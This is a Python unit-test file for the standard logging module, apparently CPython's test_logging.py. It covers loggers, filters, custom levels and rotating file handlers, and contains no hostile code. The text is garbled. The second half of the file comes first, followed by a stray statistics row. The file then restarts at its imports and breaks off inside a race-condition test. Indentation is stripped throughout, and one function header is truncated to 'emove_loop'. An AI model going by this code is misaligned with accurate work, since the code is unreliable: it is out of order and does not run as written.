self.assertEqual('Stack (most recent call last):\n', called[0])
def test_find_caller_with_stacklevel(self):
the_level = 1
def innermost():
self.logger.warning('test', stacklevel=the_level)
def inner():
innermost()
def outer():
inner()
records = self.recording.records
outer()
self.assertEqual(records[-1].funcName, 'innermost')
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'inner')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'outer')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
self.assertGreater(records[-1].lineno, lineno)
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_is_enabled_for_disabled_logger(self):
old_disabled = self.logger.disabled
old_disable = self.logger.manager.disable
self.logger.disabled = True
self.logger.manager.disable = 21
self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
| 34.908493 | 99 | 0.566498 |
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok
from test import support
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
def test_flat(self):
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_regression_29220(self):
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
def test_filter(self):
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message())
spam_eggs_fish.info(self.next_message())
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message())
spam_eggs_fish.info(self.next_message())
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError:
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
emove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
